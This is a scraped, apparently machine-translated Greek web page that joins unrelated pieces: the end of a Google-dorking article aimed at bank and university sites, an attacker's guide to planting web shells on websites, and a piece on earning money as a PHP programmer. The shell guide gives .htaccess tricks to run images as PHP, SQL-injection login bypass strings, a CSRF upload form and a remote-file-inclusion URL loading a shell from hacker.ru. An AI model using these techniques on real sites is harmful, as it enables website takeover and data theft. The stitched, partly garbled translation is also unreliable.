Google ενδέχεται να μην βρει ακριβή αντιστοίχιση και να εμφανίσει παρόμοιο αποτέλεσμα.</p><p>Σε αυτή την περίπτωση, είναι πιο συνετό να χρησιμοποιήσετε την προσωπική σας λίστα με τους ντόκους. Για παράδειγμα, αξίζει πάντα να αναζητάτε αρχεία με «ασυνήθιστες» επεκτάσεις, παραδείγματα των οποίων φαίνονται στην Εικόνα 8. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 8 – Λίστα επεκτάσεων αρχείων που δεν είναι τυπικές για έναν κανονικό πόρο Ιστού</p><p>Ως αποτέλεσμα, με την εντολή dorks google –D extensions.txt –f bank, από το πρώτο κιόλας αίτημα η Google αρχίζει να επιστρέφει ιστότοπους με «ασυνήθιστες» επεκτάσεις αρχείων (βλ. Εικόνα 9). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 9 – Αναζήτηση για «κακούς» τύπους αρχείων σε τραπεζικούς ιστότοπους</p><p>Αξίζει να έχετε κατά νου ότι η Google δεν δέχεται ερωτήσεις μεγαλύτερες από 32 λέξεις.</p><p>Χρησιμοποιώντας την εντολή dorks google –d intext:"error|warning|notice|syntax" –f University <br>Μπορείτε να αναζητήσετε σφάλματα διερμηνέα PHP σε εκπαιδευτικούς ιστότοπους (βλ. Εικόνα 10). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 10 – Εύρεση σφαλμάτων χρόνου εκτέλεσης PHP</p><p>Μερικές φορές δεν είναι βολικό να χρησιμοποιείτε μία ή δύο κατηγορίες κουκουτσιών. <br>Για παράδειγμα, εάν είναι γνωστό ότι ο ιστότοπος εκτελείται με τη μηχανή Wordpress, τότε χρειαζόμαστε ενότητες ειδικά για το WordPress. Σε αυτήν την περίπτωση, είναι βολικό να χρησιμοποιήσετε την αναζήτηση Google Hack Database. Η εντολή dorks ghdb –q wordpress –o wordpress_dorks.txt θα πραγματοποιήσει λήψη όλων των dorks από το Wordpress, όπως φαίνεται στην Εικόνα 11: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 11 – Αναζήτηση για Dorks που σχετίζονται με το Wordpress</p><p>Ας επιστρέψουμε ξανά στις τράπεζες και ας χρησιμοποιήσουμε την εντολή dorks google –D wordpress_dords.txt –f bank για να προσπαθήσουμε να βρούμε κάτι ενδιαφέρον που σχετίζεται με το Wordpress (βλ. Εικόνα 12). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 12 – Αναζήτηση για τρωτά σημεία του Wordpress</p><p>Αξίζει να σημειωθεί ότι η αναζήτηση στο Google Hack Database δεν δέχεται λέξεις μικρότερες από 4 χαρακτήρες. Για παράδειγμα, εάν το CMS του ιστότοπου δεν είναι γνωστό, αλλά η γλώσσα είναι γνωστή - PHP. Σε αυτήν την περίπτωση, μπορείτε να φιλτράρετε ό,τι χρειάζεστε χειροκίνητα χρησιμοποιώντας το σωλήνα και το βοηθητικό πρόγραμμα αναζήτησης συστήματος dorks –c all | findstr /I php > php_dorks.txt (δείτε Εικόνα 13): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 13 – Αναζήτηση σε όλα τα dorks όπου αναφέρεται η PHP</p><p>Η αναζήτηση για τρωτά σημεία ή ορισμένες ευαίσθητες πληροφορίες σε μια μηχανή αναζήτησης θα πρέπει να γίνεται μόνο εάν υπάρχει σημαντικό ευρετήριο σε αυτόν τον ιστότοπο. Για παράδειγμα, εάν ένας ιστότοπος έχει 10-15 σελίδες ευρετηριασμένες, τότε είναι ανόητο να αναζητάτε οτιδήποτε με αυτόν τον τρόπο. Ο έλεγχος του μεγέθους του ευρετηρίου είναι εύκολος - απλώς πληκτρολογήστε "site:somesite.com" στη γραμμή αναζήτησης Google. Ένα παράδειγμα τοποθεσίας με ανεπαρκή ευρετήριο φαίνεται στο Σχήμα 14. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 14 – Έλεγχος του μεγέθους ευρετηρίου τοποθεσίας</p><p>Τώρα για το δυσάρεστο... Κατά καιρούς η Google μπορεί να ζητήσει ένα captcha - δεν μπορείτε να κάνετε τίποτα γι 'αυτό - θα πρέπει να το εισάγετε. Για παράδειγμα, κατά την αναζήτηση στην κατηγορία «Μηνύματα σφάλματος» (90 dorks), το captcha εμφανίστηκε μόνο μία φορά.</p><p>Αξίζει να προσθέσουμε ότι το phantomjs υποστηρίζει επίσης την εργασία μέσω διακομιστή μεσολάβησης, τόσο μέσω διεπαφής http όσο και μέσω κάλτσες. Για να ενεργοποιήσετε τη λειτουργία διακομιστή μεσολάβησης, πρέπει να αφαιρέσετε το σχόλιο της αντίστοιχης γραμμής στο dorks.bat ή στο dorks.sh.</p><p>Το εργαλείο είναι διαθέσιμο ως πηγαίος κώδικας</p> <br>Σε αυτό το άρθρο θέλω να μιλήσω για τις πιο συχνά χρησιμοποιούμενες μεθόδους μεταφόρτωσης ενός κελύφους σε έναν ιστότοπο. <b>Web-shell</b>είναι ένα είδος κακόβουλου σεναρίου (προγράμματος) που χρησιμοποιούν οι εισβολείς για τον έλεγχο ιστοσελίδων ή διακομιστών. <p><b>Μέθοδος 1</b><br>Βρείτε μια φόρμα στον ιστότοπο για τη μεταφόρτωση αρχείων/εικόνων. Ας υποθέσουμε ότι δεν μπορέσαμε να χακάρουμε τον πίνακα διαχείρισης του ιστότοπου και προσπαθούμε να πλημμυρίσουμε το κέλυφός μας με <b>extension.php.jpg .</b>Εάν είναι επιτυχής, θα δούμε ένα λευκό παράθυρο αντί για την εικόνα, κάνουμε δεξί κλικ και ακολουθούμε τον σύνδεσμο. Σε περίπτωση αποτυχίας, μπορούμε να χρησιμοποιήσουμε την επέκταση chrome <b>παραβίαση δεδομένων</b>. Σας επιτρέπει να παρακολουθείτε και να αλλάζετε το αίτημα όπως θέλετε. Εάν ο ιστότοπος ελέγξει την επέκταση αρχείου, τότε πρώτα μπορούμε να ανεβάσουμε <b>.htaccess</b>αρχείο με περιεχόμενα: <br>Εφαρμογή AddType/x-httpd-php .jpg <br>Αυτή η εντολή θα εκτελέσει αρχεία jpg ως php. <br><b>Αναλυτικές οδηγίες βίντεο:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>Οδηγίες βίντεο για <b>εγκατάσταση δεδομένων παραβίασης:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>Μέθοδος 2</b><br>Χρησιμοποιήστε το πρόγραμμα για να αναζητήσετε πίνακες διαχειριστή στον ιστότοπο - https://github.com/bdblackhat/admin-panel-finder. Όταν το πρόγραμμα βρει τον πίνακα διαχείρισης, μπορούμε να δοκιμάσουμε το sql-injection. Στο πεδίο σύνδεσης και κωδικού πρόσβασης του ιστότοπου εισάγουμε τον κωδικό: <br><p>" ή "1"="1 " Ή 1=1/*</p><p>Εάν λειτουργεί, τότε φτάνουμε στον πίνακα διαχείρισης και <b>Προχωράμε σύμφωνα με τη μέθοδο 1.</b>Εάν δεν υπάρχει sql-injection στον πίνακα διαχείρισης του ιστότοπου, τότε μπορούμε να προσπαθήσουμε να το διορθώσουμε ή να βρούμε ένα exploit για αυτό το CMS. <br><b>Αναλυτικές οδηγίες βίντεο:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>Μέθοδος 3</b><br>Στη μέθοδο 3 θα αναζητήσουμε sql-injection στον ίδιο τον ιστότοπο. Μπορούμε να το κάνουμε χειροκίνητα ή να χρησιμοποιήσουμε το sqlmap. Υπάρχουν αρκετά θέματα στο φόρουμ σχετικά με το πώς να κάνετε τις ενέσεις, οπότε θα έρθω από μακριά. Έτσι, τώρα έχουμε ήδη βρει έναν πίνακα με τα στοιχεία σύνδεσης και τον κωδικό πρόσβασης του διαχειριστή, αποκρυπτογραφήστε τα hashes, μεταβείτε στον πίνακα διαχείρισης και χαρείτε. Αλλά ας πούμε ότι δεν μπορέσαμε να αποκρυπτογραφήσουμε τον κωδικό πρόσβασης και όλα πήγαν στραβά, τότε πρέπει να ελέγξουμε τα προνόμια του χρήστη μας <b>. </b>Ελέγχουμε τα προνόμια και φορτώνουμε το μίνι κέλυφος. <b>Για κάποιο λόγο, όταν θέλω να επικολλήσω τον κώδικα, ο ιστότοπος μου βγάζει ένα σφάλμα.</b><p><b>Μέθοδος 4</b><br>Η μέθοδος 4 περιλαμβάνει μια επίθεση csrf. Στον παρακάτω κώδικα πρέπει να αντικαταστήσουμε <b>http://</b>στον σύνδεσμο στόχο μας. <b>Επιλέξτε κέλυφος</b>και πατήστε το κουμπί <b>μεταφόρτωση.</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Μεταφόρτωση"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>Μέθοδος 5</b><br>Μάθετε περισσότερα για τον στόχο σας και βρείτε ένα exploit. Υπάρχει ένας πολύ ενδιαφέρον ιστότοπος για αυτό - https://www.exploit-db.com. Κανείς δεν έχει ακυρώσει τη μαζική παραβίαση ιστοσελίδων μέσω τρωτών σημείων, αλλά υπάρχει ήδη ένα άρθρο σχετικά με αυτό στη φόρμα. <p>Υπάρχουν πολλοί περισσότεροι τρόποι για να γεμίσετε ένα κέλυφος και δεν έχει νόημα να μιλάμε για τον καθένα. Εάν θέλετε να εξασκηθείτε, εγκαταστήστε το dvwa - είναι ένα πρόγραμμα που έχει σχεδιαστεί για να βοηθά τους επαγγελματίες ασφαλείας να δοκιμάσουν τις δεξιότητες και τα εργαλεία τους σε νομικό περιβάλλον.</p><p><b>Μέθοδος 6 <br><b>Έγχυση Php</b>- αυτή είναι μια μορφή επίθεσης σε έναν ιστότοπο όταν ο εισβολέας εισάγει τον κώδικα PHP του στην εφαρμογή PHP που δέχεται επίθεση.</b><br>www.site.ru?page=home.html <br>Εκτελώντας την εντολή θα φορτώσουμε τη σελίδα home,html. Τώρα θα προσπαθήσουμε να φορτώσουμε ένα κακόβουλο κέλυφος. <br>www.site.ru?page=http://hacker.ru/webshell.php <br>Dork: <b>Inurl:page=</b></p><p>Υπάρχει επίσης ένας τρόπος να βρείτε ένα ήδη φορτωμένο κέλυφος χρησιμοποιώντας το perl</p> <p> » </p><h1>Πώς μπορεί ένας προγραμματιστής PHP να βγάλει καλά χρήματα στο σπίτι;</h1><p>Οι περισσότεροι επιτυχημένοι προγραμματιστές PHP κερδίζουν καλά χρήματα από το σπίτι. Στην αρχή κάθε εισοδήματος, προκύπτουν δυσκολίες. Συμβαίνει ότι οι δυσκολίες και η έλλειψη γνώσης των μεθόδων κέρδους αποθαρρύνουν κάθε επιθυμία να κερδίσουν χρήματα στο σπίτι, και στη συνέχεια οι προγραμματιστές αναζητούν την ευκαιρία να εργαστούν σε γραφεία, όπου υπάρχει μεγαλύτερη εγγύηση ότι μπορούν να ληφθούν χρήματα κάθε μήνα και η επαγγελματική ανάπτυξη είναι δυνατόν.</p><p>Αλλά το να μπορείς να εργάζεσαι από το σπίτι έχει περισσότερα πλεονεκτήματα παρά μειονεκτήματα.</p><h3>πλεονεκτήματα</h3><p>Θα δουλέψεις για τον εαυτό σου. Κανείς δεν θα σας απολύσει, θα μπορείτε να μοιράσετε το δικό σας πρόγραμμα ή να εργαστείτε την ώρα που θέλετε.</p><p>Επιλέγετε μόνοι σας έναν τρόπο να κερδίσετε χρήματα χρησιμοποιώντας προγραμματισμό, ο οποίος, πρώτον, θα αυξήσει το ενδιαφέρον σας για τη δουλειά και, δεύτερον, έχετε μεγάλη ελευθερία δράσης. Δεν χρειάζεται να δουλέψεις για κάτι που δεν σου αρέσει. Υπάρχουν επίσης περισσότερες ευκαιρίες για να συνδυάσετε τρόπους απόκτησης χρημάτων.</p><h3>Μειονεκτήματα</h3><p>Στην αρχή θα είναι δύσκολο και για να πάρεις τα πρώτα χρήματα για τη δουλειά σου πρέπει να επενδύσεις πολύ κόπο και χρόνο. Και για να υπάρχει κέρδος πρέπει συνεχώς να αναπτύσσεσαι και να έχεις υπομονή και να μοιράζεις σωστά το πρόγραμμά σου ώστε να έχεις αρκετό χρόνο για να ολοκληρώσεις τη δουλειά στην ώρα σου.</p><h3>Κερδίζοντας χρήματα από τα σενάρια σας</h3><p>Υπάρχουν πολλά διαφορετικά σενάρια στο Διαδίκτυο που οι άνθρωποι μπορούν εύκολα να κατεβάσουν και να εγκαταστήσουν στον ιστότοπό τους. Μπορείτε να γράψετε το δικό σας μοναδικό σενάριο και υπάρχουν δύο επιλογές για το πώς μπορείτε να κερδίσετε χρήματα από το σενάριό σας. Πουλήστε το ή δημοσιεύστε το μέσω υπηρεσιών κοινής χρήσης αρχείων. Μπορείτε επίσης να χρησιμοποιήσετε δύο επιλογές. Για παράδειγμα, ελαφριά σενάρια, αλλά ταυτόχρονα είναι επίσης πολύ σημαντικό να τοποθετούνται μέσω των υπηρεσιών κοινής χρήσης αρχείων ακριβώς εκείνα τα σενάρια που θα έχουν μεγάλη ζήτηση. Για να γίνει αυτό, τα σενάρια πρέπει να είναι περιζήτητα, ώστε οι άνθρωποι να τα κατεβάζουν για τις ανάγκες τους.</p><p>Μεγάλα σενάρια μπορούν να πουληθούν σε λογικές τιμές. Μπορείτε να δημοσιεύσετε μια διαφήμιση σε φόρουμ ή εάν έχετε το δικό σας προσωπικό blog ή ιστότοπο, να τοποθετήσετε μια διαφήμιση για την πώληση σεναρίων.</p><p>Σε κάθε περίπτωση, ανεξάρτητα από την επιλογή που θα επιλέξετε, τοποθετήστε το σενάριο στο αρχείο και φροντίστε να συμπεριλάβετε λεπτομερείς οδηγίες και στοιχεία επικοινωνίας για εσάς. Φροντίστε να παρέχετε υποστήριξη, γιατί είναι σημαντικό για εσάς να εργαστείτε για τον εαυτό σας. Μετά από όλα, πρέπει να σας προτείνουν ή να κάνετε λήψη των σεναρίων σας. Πρέπει να είναι υψηλής ποιότητας. Εάν κάποιος σας ζητήσει βοήθεια, εξηγήστε του ευγενικά για το σενάριο ή βοηθήστε τον να το εγκαταστήσει. Τα σενάρια σας πρέπει να έχουν σχόλια. Για τι είναι υπεύθυνη η κάθε λειτουργία κ.λπ. Μετά από όλα, ένα άτομο μπορεί εύκολα να μπερδευτεί στον κώδικά σας, όπου δεν υπάρχουν σημειώσεις.</p><h3>Δικά και κοινά έργα</h3><p>Είναι καλό να δημιουργήσετε τον δικό σας ιστότοπο για να κερδίσετε χρήματα με επιτυχία. Υπάρχουν πολλές ευκαιρίες για να κερδίσετε χρήματα με τον ιστότοπό σας. Εάν το προωθήσετε καλά, μπορείτε να δημοσιεύσετε σενάρια εκεί προς πώληση. Τα συλλογικά έργα θα επεκτείνουν τις δυνατότητές σας, κάτι που είναι καλό για την επιτυχία του οικιακού προγραμματισμού. Επομένως, αναζητήστε συνεργάτες ή μην αρνηθείτε προσφορές για να δημιουργήσετε ένα έργο μαζί.</p><p>Θα πρέπει να φροντίσετε να προσθέσετε χαρακτηριστικά που τραβούν την προσοχή στον ιστότοπό σας. Ο ιστότοπος μπορεί να έχει μια κανονική, απλή εμφάνιση, αλλά ταυτόχρονα με τη δική του ανατροπή. Ένας προσωπικός ιστότοπος βοηθά στην αύξηση των πελατών. Θα δουν πώς λειτουργούν τα σενάρια σας, αν δεν αργούν να φορτωθούν, είναι ενδιαφέροντα στη χρήση και, το πιο σημαντικό, πρωτότυπα, σε αντίθεση με οτιδήποτε άλλο. Τότε θα βρεις επιτυχία.</p><h3>Κέρδη από παραγγελίες</h3><p>Για να το κάνετε αυτό, απλώς εγγραφείτε σε διάφορα ανταλλακτήρια για ελεύθερους επαγγελματίες και αναζητήστε παραγγελίες. Εκθέστε το χαρτοφυλάκιο των ολοκληρωμένων εργασιών σας. Προσοχή όμως, υπάρχουν ανέντιμοι άνθρωποι στον κόσμο και για να μην πέσετε στην εξαπάτηση, δείξτε πρώτα το έργο που βρίσκεται στον διακομιστή σας (παρεμπιπτόντως, σε αυτήν την περίπτωση θα χρειαστεί να νοικιάσετε ένα vps http:/ /nkvd.pro/vps/), και μετά αν σας πληρώσουν μέρος, μεταφέρετε τα μισά στον διακομιστή τους και κάντε το ίδιο με το δεύτερο μέρος. Αυτή η μέθοδος απόκτησης χρημάτων θεωρείται κερδοφόρα, αλλά εξαρτάται από τον βαθμό των γνώσεων και των δεξιοτήτων σας. Εξαρτάται επίσης από τα σχόλια των πελατών σας. Για να πετύχετε σε αυτή τη μέθοδο κερδών χρημάτων, κάντε τη δουλειά με ειλικρίνεια και αποτελεσματικότητα. Πρέπει να είστε σε θέση να επικοινωνείτε με τους πελάτες, να εξηγείτε ξεκάθαρα τι μπορείτε και τι δεν μπορείτε να κάνετε.</p><p>Αυτή δεν είναι ολόκληρη η λίστα κερδών για έναν προγραμματιστή php, αλλά χάρη σε αυτές τις μεθόδους απόκτησης χρημάτων, που γράφτηκαν παραπάνω, μπορείτε ήδη να κερδίσετε χρήματα χωρίς να φύγετε από το σπίτι. Στο αρχικό στάδιο, αυτό θα είναι ένα μεγάλο επίτευγμα. Το κύριο πράγμα είναι να μην σταματήσουμε εκεί. Βελτιώστε συνεχώς και δημιουργήστε έργα που θα σας φέρουν όχι μόνο καλό εισόδημα, αλλά και ευχαρίστηση.</p> <br><b>Σχετικά με τον Συγγραφέα</b> <br><p>Πώς μπορεί ένας προγραμματιστής PHP να βγάλει καλά χρήματα στο σπίτι;</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">Σχετικές δημοσιεύσεις</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/d356145b8d32a4e43aa5ed76e39606a7.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/el/vstupit-v-gruppu-po-zarabotku-deneg-kak-zarabotat.html">Πώς να κερδίσετε χρήματα στο VKontakte στη σελίδα σας και χωρίς αυτό - πραγματικά λειτουργικές μέθοδοι</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/c140bebb4b361b4583c11c49e770bc39.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/el/kak-pomenyat-temu-dlya-vkontakte-v-yandeks-brauzere-kak-pomenyat-temu-v-kontakte.html">Πώς να αλλάξετε το θέμα για το VKontakte στο Yandex</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/40e1db5c5747911f9c43c259f44aeadb.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/el/nastroika-velokompyutera-na-diametr-koles-26-2-2-podklyuchenie-velokompyutera-kak.html">Ρύθμιση του υπολογιστή ποδηλάτου για διάμετρο τροχού 26 2</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/programs/">Προγράμματα</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/devices/">συσκευές</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/browsers/">Προγράμματα περιήγησης</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/reviews/">Κριτικές</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/reviews/">Κριτικές</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/setup/">Ρυθμίσεις</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/torrent/">Χείμαρος</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/editors/">Συντάκτες</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/instagram/">Ίνσταγκραμ</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">Οι τελευταίες σημειώσεις</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/5e60cc62a5f20ab07a340013922f0d2c.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Ο μικρότερος υπολογιστής στον κόσμο: φωτογραφία, περιγραφή, βαθμολογία Ο μικρότερος υπολογιστής στον κόσμο" / loading=lazy loading=lazy> <span class="cat">Προγράμματα</span></div> <a href="https://storerarity.ru/el/samyi-malenkii-kompyuter-v-mire-foto-opisanie-reiting.html">Ο μικρότερος υπολογιστής στον κόσμο: φωτογραφία, περιγραφή, βαθμολογία Ο μικρότερος υπολογιστής στον κόσμο</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/cdb555606d94b8ae1d51c87fc743c991.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Πώς να εγκαταστήσετε την εφαρμογή Yula και να εγγραφείτε" / loading=lazy loading=lazy> <span class="cat">Προγράμματα</span></div> <a href="https://storerarity.ru/el/kak-postavit-prilozhenie-yula-zaregistrirovatsya-prilozhenie-yula-ustanovka.html">Πώς να εγκαταστήσετε την εφαρμογή Yula και να εγγραφείτε</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/af70d4bfa7ecf603e659893b5979f8d6.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Smartphone Samsung Grand Duos: χαρακτηριστικά, κριτικές περιγραφή Samsung galaxy grand duos" / loading=lazy loading=lazy> <span class="cat">Προγράμματα</span></div> <a href="https://storerarity.ru/el/samsung-galaxy-grand-duos-bolshoi-i-moshchnyi-smartfon-samsung-grand-duos-harakteristiki-otzyvy-sam.html">Smartphone Samsung Grand Duos: χαρακτηριστικά, κριτικές περιγραφή Samsung galaxy grand duos</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | Υπολογιστές για όλους - Εγκατάσταση, εγκατάσταση, ανάκτηση</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/programs/">Προγράμματα</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/devices/">συσκευές</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/browsers/">Προγράμματα περιήγησης</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/reviews/">Κριτικές</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/reviews/">Κριτικές</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/setup/">Ρυθμίσεις</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/el/category/torrent/">Χείμαρος</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>